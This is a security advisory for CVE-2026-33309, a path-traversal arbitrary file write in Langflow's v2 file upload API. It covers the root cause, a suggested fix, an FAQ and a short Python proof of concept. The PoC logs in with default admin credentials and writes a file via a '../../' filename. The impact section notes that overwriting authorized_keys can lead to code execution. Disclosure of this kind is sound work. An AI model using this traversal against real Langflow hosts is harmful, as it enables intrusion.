CVE-2026-33309: Langflow has an Arbitrary File Write (RCE) via v2 API
Summary
While reviewing the recent patch for CVE-2025-68478 (External Control of File Name in v1.7.1), I discovered that the root architectural issue within LocalStorageService remains unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer ValidatedFileName dependency.
This defense-in-depth failure leaves the POST /api/v2/files/ endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE).
Details The vulnerability exists in two layers:
1. API Layer (src/backend/base/langflow/api/v2/files.py:162): Inside the uploaduserfile route, the filename is extracted directly from the multipart Content-Disposition header (newfilename = file.filename). It is passed verbatim to the storage service. ValidatedFileName provides zero protection here as it only guards URL path parameters. 2. Storage Layer (src/backend/base/langflow/services/storage/local.py:114-116): The LocalStorageService uses naive path concatenation (filepath = folderpath / filename). It lacks a resolve().isrelativeto(basedir) containment check.
Recommended Fix:
1. Sanitize the multipart filename before processing:
python from pathlib import Path as StdPath newfilename = StdPath(file.filename or "").name # Strips directory traversal characters if not newfilename or ".." in newfilename: raise HTTPException(statuscode=400, detail="Invalid file name")
2. Add a canonical path containment check inside LocalStorageService.savefile to permanently kill this vulnerability class.
PoC This Python script verifies the vulnerability against langflowai/langflow:latest (v1.7.3) by writing a file outside the user's UUID storage directory.
python import requests
BASEURL = "http://localhost:7860" Authenticate to get a valid JWT token = requests.post(f"{BASEURL}/api/v1/login", data={"username": "admin", "password": "admin"}).json()["accesstoken"]
Payload using directory traversal in the multipart filename TRAVERSALFILENAME = "../../traversalproof.txt" SENTINELCONTENT = b"CVERESEARCHSENTINELKEY"
resp = requests.post( f"{BASEURL}/api/v2/files/", headers={"Authorization": f"Bearer {token}"}, files={"file": (TRAVERSALFILENAME, SENTINELCONTENT, "text/plain")}, )
print(f"Status: {resp.statuscode}") # Returns 201 The file is successfully written to /app/data/.cache/langflow/traversalproof.txt
Server Logs: 2026-02-19T10:04:54.031888Z [info ] File ../traversalproof.txt saved successfully in flow 3668bcce-db6c-4f58-834c-f49ba0024fcb. 2026-02-19T10:05:51.792520Z [info ] File secretimage.png saved successfully in flow 3668bcce-db6c-4f58-834c-f49ba0024fcb. Docker cntainer file: user@40416f6848f2:~/.cache/langflow$ ls 3668bcce-db6c-4f58-834c-f49ba0024fcb profilepictures secretkey traversalproof.txt
Impact Authenticated Arbitrary File Write. An attacker can overwrite critical system files, inject malicious Python components, or overwrite .ssh/authorizedkeys to achieve full Remote Code Execution on the host server.
Other sources
Langflow is a tool for building and deploying AI-powered agents and workflows. Versions 1.2.0 through 1.8.1 have a bypass of the patch for CVE-2025-68478 (External Control of File Name), leading to the root architectural issue within LocalStorageService remaining unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer ValidatedFileName dependency. This defense-in-depth failure leaves the POST /api/v2/files/ endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE). Version 1.9.0 contains an updated fix.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-33309?
CVE-2026-33309 has a high severity due to the unresolved architectural issues within the LocalStorageService.
How do I fix CVE-2026-33309?
To fix CVE-2026-33309, update the langflow package to version 1.9.0 or later.
What are the affected versions of langflow for CVE-2026-33309?
CVE-2026-33309 affects langflow versions between 1.2.0 and 1.8.1.
Is there a patch available for CVE-2026-33309?
Yes, the patch for CVE-2026-33309 is included in langflow version 1.9.0.
What underlying issue does CVE-2026-33309 expose?
CVE-2026-33309 exposes the lack of boundary containment checks in the LocalStorageService.